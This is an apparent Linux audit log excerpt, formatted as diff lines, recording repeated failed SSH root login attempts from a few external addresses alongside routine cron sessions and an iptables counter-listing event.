+type=USER_LOGIN msg=audit(1551485602.940:277): pid=16698 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485605.424:278): pid=16698 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485605.424:279): pid=16698 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485607.852:280): pid=16698 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485607.852:281): pid=16698 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485611.596:282): pid=16708 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485611.596:283): pid=16708 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485614.472:284): pid=16708 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485614.472:285): pid=16708 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485617.472:286): pid=16708 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485617.472:287): pid=16708 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485621.912:288): pid=16720 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485621.912:289): pid=16720 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485624.336:290): pid=16720 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485624.336:291): pid=16720 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485626.700:292): pid=16720 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485626.700:293): pid=16720 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485641.336:294): pid=16743 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485641.336:295): pid=16743 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485641.340:296): pid=16743 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=245 res=1
+type=USER_START msg=audit(1551485641.340:297): pid=16743 uid=0 auid=0 ses=245 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485641.340:298): pid=16743 uid=0 auid=0 ses=245 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485641.340:299): pid=16743 uid=0 auid=0 ses=245 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485651.040:300): pid=16749 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=54.38.82.14 addr=54.38.82.14 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485651.040:301): pid=16749 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=54.38.82.14 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485701.344:302): pid=16804 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485701.344:303): pid=16804 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551485701.344:304): pid=16807 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485701.344:305): pid=16804 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=246 res=1
+type=USER_START msg=audit(1551485701.344:306): pid=16804 uid=0 auid=0 ses=246 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485701.344:307): pid=16807 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485701.344:308): pid=16807 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=247 res=1
+type=USER_START msg=audit(1551485701.348:309): pid=16807 uid=0 auid=0 ses=247 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551485701.348:310): pid=16806 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485701.348:311): pid=16806 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485701.348:312): pid=16806 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=248 res=1
+type=USER_ACCT msg=audit(1551485701.348:313): pid=16805 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485701.348:314): pid=16805 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485701.348:315): pid=16805 uid=0 subj==unconfined old-auid=4294967295 auid=998 tty=(none) old-ses=4294967295 ses=249 res=1
+type=USER_START msg=audit(1551485701.348:316): pid=16806 uid=0 auid=0 ses=248 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551485701.352:317): pid=16805 uid=0 auid=998 ses=249 subj==unconfined msg='op=PAM:session_open acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485701.356:318): pid=16807 uid=0 auid=0 ses=247 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485701.356:319): pid=16807 uid=0 auid=0 ses=247 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485701.376:320): pid=16804 uid=0 auid=0 ses=246 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485701.376:321): pid=16804 uid=0 auid=0 ses=246 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485701.376:322): pid=16806 uid=0 auid=0 ses=248 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485701.380:323): pid=16806 uid=0 auid=0 ses=248 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=NETFILTER_CFG msg=audit(1551485718.785:324): table=security family=2 entries=6
+type=SYSCALL msg=audit(1551485718.785:324): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=55dc13c78fe0 items=0 ppid=16870 pid=16871 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=PROCTITLE msg=audit(1551485718.785:324): proctitle=69707461626C6573002D77002D74007365637572697479002D4C004F5554505554002D2D7A65726F004F5554505554002D6E7876
+type=CRED_DISP msg=audit(1551485719.081:325): pid=16805 uid=0 auid=998 ses=249 subj==unconfined msg='op=PAM:setcred acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485719.085:326): pid=16805 uid=0 auid=998 ses=249 subj==unconfined msg='op=PAM:session_close acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551485761.085:327): pid=16971 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485761.085:328): pid=16971 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485761.085:329): pid=16971 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=250 res=1
+type=USER_START msg=audit(1551485761.085:330): pid=16971 uid=0 auid=0 ses=250 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485761.089:331): pid=16971 uid=0 auid=0 ses=250 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485761.089:332): pid=16971 uid=0 auid=0 ses=250 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485809.301:333): pid=17016 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485809.301:334): pid=17016 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485811.101:335): pid=17016 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485811.101:336): pid=17016 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485813.885:337): pid=17016 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485813.885:338): pid=17016 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485820.733:339): pid=17026 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485820.733:340): pid=17026 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485821.093:341): pid=17037 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485821.093:342): pid=17037 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485821.093:343): pid=17037 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=251 res=1
+type=USER_ACCT msg=audit(1551485821.093:344): pid=17038 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485821.093:345): pid=17038 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551485821.093:346): pid=17037 uid=0 auid=0 ses=251 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485821.093:347): pid=17038 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=252 res=1
+type=USER_START msg=audit(1551485821.093:348): pid=17038 uid=0 auid=0 ses=252 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485821.097:349): pid=17038 uid=0 auid=0 ses=252 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485821.097:350): pid=17038 uid=0 auid=0 ses=252 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485821.097:351): pid=17037 uid=0 auid=0 ses=251 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485821.097:352): pid=17037 uid=0 auid=0 ses=251 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485824.689:353): pid=17026 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485824.689:354): pid=17026 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485827.213:355): pid=17026 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485827.217:356): pid=17026 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485833.721:357): pid=17046 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485833.721:358): pid=17046 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485837.725:359): pid=17046 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485837.725:360): pid=17046 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485839.841:361): pid=17046 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485839.841:362): pid=17046 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485852.353:363): pid=17068 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485852.353:364): pid=17068 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485854.953:365): pid=17068 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485854.953:366): pid=17068 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485856.873:367): pid=17068 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485856.873:368): pid=17068 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485864.509:369): pid=17084 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485864.509:370): pid=17084 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485866.897:371): pid=17084 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485866.901:372): pid=17084 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485868.733:373): pid=17084 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485868.733:374): pid=17084 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485880.457:375): pid=17098 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485880.457:376): pid=17098 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485881.097:377): pid=17105 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485881.097:378): pid=17105 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485881.097:379): pid=17105 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=253 res=1
+type=USER_START msg=audit(1551485881.097:380): pid=17105 uid=0 auid=0 ses=253 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485881.097:381): pid=17105 uid=0 auid=0 ses=253 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485881.097:382): pid=17105 uid=0 auid=0 ses=253 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485882.773:383): pid=17098 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485882.773:384): pid=17098 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485885.453:385): pid=17098 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485885.453:386): pid=17098 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485893.077:387): pid=17111 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485893.077:388): pid=17111 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485895.125:389): pid=17111 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485895.125:390): pid=17111 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485897.757:391): pid=17111 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485897.757:392): pid=17111 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485907.613:393): pid=17127 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485907.613:394): pid=17127 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485910.201:395): pid=17127 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485910.201:396): pid=17127 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485911.881:397): pid=17127 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485911.881:398): pid=17127 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485917.278:399): pid=17147 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485917.278:400): pid=17147 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485919.270:401): pid=17147 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485919.270:402): pid=17147 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485921.890:403): pid=17147 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485921.894:404): pid=17147 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485927.578:405): pid=17159 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485927.578:406): pid=17159 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485929.570:407): pid=17159 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
